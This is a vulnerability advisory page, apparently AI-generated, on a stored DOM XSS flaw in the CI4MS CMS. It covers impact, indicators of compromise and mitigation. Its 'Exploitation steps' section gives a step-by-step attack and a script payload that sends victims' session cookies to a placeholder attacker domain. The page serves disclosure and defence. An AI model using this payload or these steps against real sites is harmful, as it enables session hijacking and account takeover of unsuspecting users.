CVE-2026-34568: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34568 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, titled "Blogs Posts Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS." The vulnerability affects all CI4MS versions up to and including 0.28.6.0, and was published on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, with an alternate score of 9.0 reported by Feedly (GitHub Advisory, Feedly).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored DOM XSS variant. The application fails to sanitize user-controlled input in the blog post creation and editing functionality (/backend/blogs/create, /backend/blogs/), allowing malicious JavaScript payloads to be stored server-side without encoding. These payloads are subsequently rendered unsafely across multiple application views — including the administrative panel and public blog page (/blog/{id}) — via unsafe DOM manipulation methods such as .html() or innerHTML, without output encoding. No sanitization mechanisms were in place prior to the patch (GitHub Advisory, Security Advisory).

Impact

Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of any user who views the compromised blog post, including administrators. This can lead to full account takeover across all user roles, privilege escalation (e.g., a low-privileged attacker gaining administrator-level access), session hijacking, and credential theft. The scope change in the CVSS score reflects that the impact extends beyond the attacker's own session to affect all users of the application, with high confidentiality impact and potential for complete application compromise (GitHub Advisory, Feedly).

Exploitability

A proof-of-concept exploit, including a video PoC, is publicly available via the GitHub security advisory and a Mega.nz link referenced therein. The vulnerability requires only low privileges (an authenticated user with blog post creation/editing rights) and, per the advisory's CVSS scoring, no user interaction is required for the payload to persist — though victims must view the post for execution. There is no current evidence of in-the-wild exploitation, no threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.021% (6th percentile), indicating a low near-term exploitation probability (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify a CI4MS installation running version 0.28.6.0 or earlier. Confirm the presence of the blog post management module by browsing to /backend/blogs/ or the public blog page.
  2. Authenticate: Log in to the application with any account that has blog post creation or editing privileges (low-privilege user is sufficient).
  3. Inject payload: Navigate to /backend/blogs/create (or edit an existing post). Insert a malicious JavaScript payload into the blog post content field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a more sophisticated DOM-based payload targeting unsafe sinks.
  4. Publish the post: Save or publish the blog post. The application stores the unsanitized payload server-side without encoding.
  5. Trigger execution: The payload executes automatically in the browser of any user (including administrators) who views the blog post via /blog/{id} or the administrative panel at /backend/blogs/.
  6. Achieve objective: Capture session cookies or tokens to perform session hijacking, escalate privileges to administrator, or perform unauthorized actions on behalf of the victim user (GitHub Advisory, Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to attacker-controlled domains (e.g., cookie-stealing endpoints) originating after viewing blog posts; unusual POST requests to /backend/blogs/create or /backend/blogs/edit containing encoded JavaScript tags (<script>, onerror=, javascript:, etc.).
  • Logs: Web server access logs showing requests to /backend/blogs/create, /backend/blogs/, or /blog/{id} with payloads containing HTML/JavaScript injection strings; application logs recording blog post saves with suspicious content fields.
  • File System / Database: Blog post records in the database containing raw JavaScript tags or encoded XSS payloads (e.g., <script>, &#60;script&#62;, %3Cscript%3E) in content fields.
  • Process/Browser Behavior: Unexpected redirects or pop-ups when administrators or users view blog posts; session tokens appearing in external server logs not associated with legitimate user activity (GitHub Advisory).

Mitigation and workarounds

Upgrade CI4MS to version 0.31.0.0 or later, which includes global input validation, enhanced CSRF token handling, and XSS/CSRF protection as part of a major security overhaul integrating CodeIgniter Shield. As an interim workaround, restrict blog post creation and editing permissions to trusted administrators only, and implement a strict Content Security Policy (CSP) header to limit unauthorized script execution. Additionally, set HttpOnly, SameSite, and Secure attributes on session cookies to reduce the impact of any successful XSS exploitation (GitHub Release, GitHub Advisory).

Community reactions

The vulnerability was reported by researchers bugmithlegend and peeefour and published by the repository maintainer bertugfahriozer. A threat intelligence write-up was published by The Hacker Wire covering the stored XSS and a related blind XSS in the logs interface. The advisory was picked up by multiple vulnerability aggregators including VulDB, CIRCL, ENISA EUVD, and CVEFeed shortly after disclosure, and a Bluesky post was noted in the Feedly timeline. No major vendor statements or widespread community controversy have been observed (Feedly).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management